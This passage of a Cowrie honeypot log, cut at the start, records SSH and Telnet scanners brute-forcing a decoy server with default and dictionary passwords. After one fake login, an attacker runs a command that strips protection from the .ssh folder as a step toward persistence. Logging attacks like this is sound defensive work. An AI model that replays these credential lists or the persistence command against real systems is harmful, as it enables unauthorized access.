com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.337082Z","src_ip":"212.227.235.229","session":"919d5f224861"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:41.560186Z","src_ip":"212.227.235.229","session":"9057363e2dfa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:25:42.460776Z","src_ip":"212.227.235.229","session":"919d5f224861"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:25:42.621882Z","src_ip":"212.227.235.229","session":"9057363e2dfa"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:43.733857Z","src_ip":"212.227.235.229","session":"919d5f224861"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:43.878831Z","src_ip":"212.227.235.229","session":"9057363e2dfa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40764,"dst_ip":"1.2.3.4","dst_port":22,"session":"7403ad9da2d4","protocol":"ssh","message":"New connection: 212.227.235.229:40764 (1.2.3.4:22) [session: 7403ad9da2d4]","sensor":"my-vps","timestamp":"2025-08-26T06:25:44.011958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:44.013226Z","src_ip":"212.227.235.229","session":"7403ad9da2d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56620,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a8557629a2b","protocol":"ssh","message":"New connection: 212.227.235.229:56620 (1.2.3.4:22) [session: 4a8557629a2b]","sensor":"my-vps","timestamp":"2025-08-26T06:25:44.140450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:25:44.141695Z","src_ip":"212.227.235.229","session":"4a8557629a2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:44.282996Z","src_ip":"212.227.235.229","session":"7403ad9da2d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:25:44.404962Z","src_ip":"212.227.235.229","session":"4a8557629a2b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:45.496791Z","src_ip":"212.227.235.229","session":"4a8557629a2b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:45.760928Z","src_ip":"212.227.235.229","session":"4a8557629a2b"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:45.762015Z","src_ip":"212.227.235.229","session":"0f3541fe3c3f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:46.022259Z","src_ip":"212.227.235.229","session":"7403ad9da2d4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:46.295122Z","src_ip":"212.227.235.229","session":"7403ad9da2d4"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:46.296278Z","src_ip":"212.227.235.229","session":"1a84ff85550c"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.240.104","src_port":37762,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e0682fec75b","protocol":"telnet","message":"New connection: 157.230.240.104:37762 (1.2.3.4:23) [session: 4e0682fec75b]","sensor":"my-vps","timestamp":"2025-08-26T06:25:51.867064Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T06:25:52.446138Z","src_ip":"157.230.240.104","session":"4e0682fec75b"}
{"eventid":"cowrie.session.closed","duration":2.8561766147613525,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:54.723121Z","src_ip":"157.230.240.104","session":"4e0682fec75b"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.240.104","src_port":37764,"dst_ip":"1.2.3.4","dst_port":23,"session":"f4db850995a4","protocol":"telnet","message":"New connection: 157.230.240.104:37764 (1.2.3.4:23) [session: f4db850995a4]","sensor":"my-vps","timestamp":"2025-08-26T06:25:54.903141Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:25:56.129109Z","src_ip":"157.230.240.104","session":"f4db850995a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:25:56.230859Z","src_ip":"157.230.240.104","session":"f4db850995a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:59.023704Z","src_ip":"157.230.240.104","session":"f4db850995a4"}
{"eventid":"cowrie.session.closed","duration":4.126535177230835,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:25:59.029611Z","src_ip":"157.230.240.104","session":"f4db850995a4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56206,"dst_ip":"1.2.3.4","dst_port":22,"session":"46827a733690","protocol":"ssh","message":"New connection: 217.72.205.35:56206 (1.2.3.4:22) [session: 46827a733690]","sensor":"my-vps","timestamp":"2025-08-26T06:26:04.902239Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:04.903828Z","src_ip":"217.72.205.35","session":"46827a733690"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56806,"dst_ip":"1.2.3.4","dst_port":23,"session":"c59f95a948ea","protocol":"telnet","message":"New connection: 212.227.125.160:56806 (1.2.3.4:23) [session: c59f95a948ea]","sensor":"my-vps","timestamp":"2025-08-26T06:26:12.502365Z"}
{"eventid":"cowrie.session.closed","duration":4.8998048305511475,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:17.402098Z","src_ip":"212.227.125.160","session":"c59f95a948ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53326,"dst_ip":"1.2.3.4","dst_port":23,"session":"d6a0c644471a","protocol":"telnet","message":"New connection: 212.227.125.160:53326 (1.2.3.4:23) [session: d6a0c644471a]","sensor":"my-vps","timestamp":"2025-08-26T06:26:17.607803Z"}
{"eventid":"cowrie.session.closed","duration":2.4367058277130127,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:20.044410Z","src_ip":"212.227.125.160","session":"d6a0c644471a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53338,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fc32e27a564","protocol":"telnet","message":"New connection: 212.227.125.160:53338 (1.2.3.4:23) [session: 9fc32e27a564]","sensor":"my-vps","timestamp":"2025-08-26T06:26:20.246402Z"}
{"eventid":"cowrie.session.closed","duration":1.9885880947113037,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:22.234892Z","src_ip":"212.227.125.160","session":"9fc32e27a564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53342,"dst_ip":"1.2.3.4","dst_port":23,"session":"5444bb74374f","protocol":"telnet","message":"New connection: 212.227.125.160:53342 (1.2.3.4:23) [session: 5444bb74374f]","sensor":"my-vps","timestamp":"2025-08-26T06:26:22.440534Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:22.999846Z","src_ip":"212.227.125.160","session":"5444bb74374f"}
{"eventid":"cowrie.session.closed","duration":2.911471366882324,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:25.351931Z","src_ip":"212.227.125.160","session":"5444bb74374f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57560,"dst_ip":"1.2.3.4","dst_port":23,"session":"c54fa43a0c54","protocol":"telnet","message":"New connection: 212.227.125.160:57560 (1.2.3.4:23) [session: c54fa43a0c54]","sensor":"my-vps","timestamp":"2025-08-26T06:26:25.553348Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:26.028498Z","src_ip":"212.227.125.160","session":"c54fa43a0c54"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:27.678813Z","src_ip":"212.227.125.160","session":"c54fa43a0c54"}
{"eventid":"cowrie.session.closed","duration":2.9453001022338867,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:28.498562Z","src_ip":"212.227.125.160","session":"c54fa43a0c54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57568,"dst_ip":"1.2.3.4","dst_port":23,"session":"a056fd447031","protocol":"telnet","message":"New connection: 212.227.125.160:57568 (1.2.3.4:23) [session: a056fd447031]","sensor":"my-vps","timestamp":"2025-08-26T06:26:28.701270Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:30.682650Z","src_ip":"212.227.125.160","session":"a056fd447031"}
{"eventid":"cowrie.session.closed","duration":5.19387149810791,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:33.895045Z","src_ip":"212.227.125.160","session":"a056fd447031"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58420,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4d0563f00ba","protocol":"telnet","message":"New connection: 212.227.125.160:58420 (1.2.3.4:23) [session: b4d0563f00ba]","sensor":"my-vps","timestamp":"2025-08-26T06:26:34.097361Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:34.184047Z","src_ip":"212.227.235.229","session":"dfca54fc6239"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:34.694249Z","src_ip":"212.227.125.160","session":"b4d0563f00ba"}
{"eventid":"cowrie.session.closed","duration":2.792935609817505,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:36.890225Z","src_ip":"212.227.125.160","session":"b4d0563f00ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58424,"dst_ip":"1.2.3.4","dst_port":23,"session":"43a42e82a669","protocol":"telnet","message":"New connection: 212.227.125.160:58424 (1.2.3.4:23) [session: 43a42e82a669]","sensor":"my-vps","timestamp":"2025-08-26T06:26:37.116704Z"}
{"eventid":"cowrie.session.closed","duration":6.246160507202148,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:43.362798Z","src_ip":"212.227.125.160","session":"43a42e82a669"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34556,"dst_ip":"1.2.3.4","dst_port":23,"session":"571c1228f941","protocol":"telnet","message":"New connection: 212.227.125.160:34556 (1.2.3.4:23) [session: 571c1228f941]","sensor":"my-vps","timestamp":"2025-08-26T06:26:43.656402Z"}
{"eventid":"cowrie.session.closed","duration":1.6243162155151367,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:45.280650Z","src_ip":"212.227.125.160","session":"571c1228f941"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34568,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d2beb09c7e8","protocol":"telnet","message":"New connection: 212.227.125.160:34568 (1.2.3.4:23) [session: 7d2beb09c7e8]","sensor":"my-vps","timestamp":"2025-08-26T06:26:45.482058Z"}
{"eventid":"cowrie.session.closed","duration":1.619110107421875,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:47.101074Z","src_ip":"212.227.125.160","session":"7d2beb09c7e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34580,"dst_ip":"1.2.3.4","dst_port":23,"session":"51859dfe35de","protocol":"telnet","message":"New connection: 212.227.125.160:34580 (1.2.3.4:23) [session: 51859dfe35de]","sensor":"my-vps","timestamp":"2025-08-26T06:26:47.304023Z"}
{"eventid":"cowrie.session.closed","duration":2.1865551471710205,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:49.490494Z","src_ip":"212.227.125.160","session":"51859dfe35de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34594,"dst_ip":"1.2.3.4","dst_port":23,"session":"5448b6bdbad6","protocol":"telnet","message":"New connection: 212.227.125.160:34594 (1.2.3.4:23) [session: 5448b6bdbad6]","sensor":"my-vps","timestamp":"2025-08-26T06:26:49.693482Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:50.428039Z","src_ip":"212.227.125.160","session":"5448b6bdbad6"}
{"eventid":"cowrie.session.closed","duration":4.6902923583984375,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:54.383699Z","src_ip":"212.227.125.160","session":"5448b6bdbad6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43388,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef42b1070143","protocol":"telnet","message":"New connection: 212.227.125.160:43388 (1.2.3.4:23) [session: ef42b1070143]","sensor":"my-vps","timestamp":"2025-08-26T06:26:54.589164Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53641,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7ce4f5df46","protocol":"ssh","message":"New connection: 212.227.235.229:53641 (1.2.3.4:22) [session: 1a7ce4f5df46]","sensor":"my-vps","timestamp":"2025-08-26T06:26:55.008368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T06:26:55.009597Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T06:26:55.114931Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:26:55.222059Z","src_ip":"212.227.125.160","session":"ef42b1070143"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:26:55.243179Z","src_ip":"212.227.125.160","session":"ef42b1070143"}
{"eventid":"cowrie.login.failed","username":"admin","password":"streak","message":"login attempt [admin/streak] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:55.622749Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.login.failed","username":"admin","password":"steiner","message":"login attempt [admin/steiner] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:56.730180Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.login.failed","username":"admin","password":"stefania","message":"login attempt [admin/stefania] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:57.838162Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.login.failed","username":"admin","password":"stefani","message":"login attempt [admin/stefani] failed","sensor":"my-vps","timestamp":"2025-08-26T06:26:58.945526Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"4.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:59.241951Z","src_ip":"212.227.125.160","session":"ef42b1070143"}
{"eventid":"cowrie.session.closed","duration":4.658277988433838,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:26:59.247371Z","src_ip":"212.227.125.160","session":"ef42b1070143"}
{"eventid":"cowrie.login.failed","username":"admin","password":"soviet","message":"login attempt [admin/soviet] failed","sensor":"my-vps","timestamp":"2025-08-26T06:27:00.051881Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:27:01.158961Z","src_ip":"212.227.235.229","session":"1a7ce4f5df46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37302,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b23f3665c84","protocol":"ssh","message":"New connection: 212.227.235.229:37302 (1.2.3.4:22) [session: 6b23f3665c84]","sensor":"my-vps","timestamp":"2025-08-26T06:28:55.679403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:28:55.680082Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:28:55.957176Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.login.success","username":"root","password":"123456*a","message":"login attempt [root/123456*a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:28:57.835253Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:28:58.423083Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:28:58.423859Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:28:58.425438Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:28:58.700138Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":19853,"dst_ip":"1.2.3.4","dst_port":22,"session":"bad77d334053","protocol":"ssh","message":"New connection: 185.246.128.133:19853 (1.2.3.4:22) [session: bad77d334053]","sensor":"my-vps","timestamp":"2025-08-26T06:29:40.095118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-WinSCP_release_4.1.9","message":"Remote SSH version: SSH-2.0-WinSCP_release_4.1.9","sensor":"my-vps","timestamp":"2025-08-26T06:29:40.096090Z","src_ip":"185.246.128.133","session":"bad77d334053"}
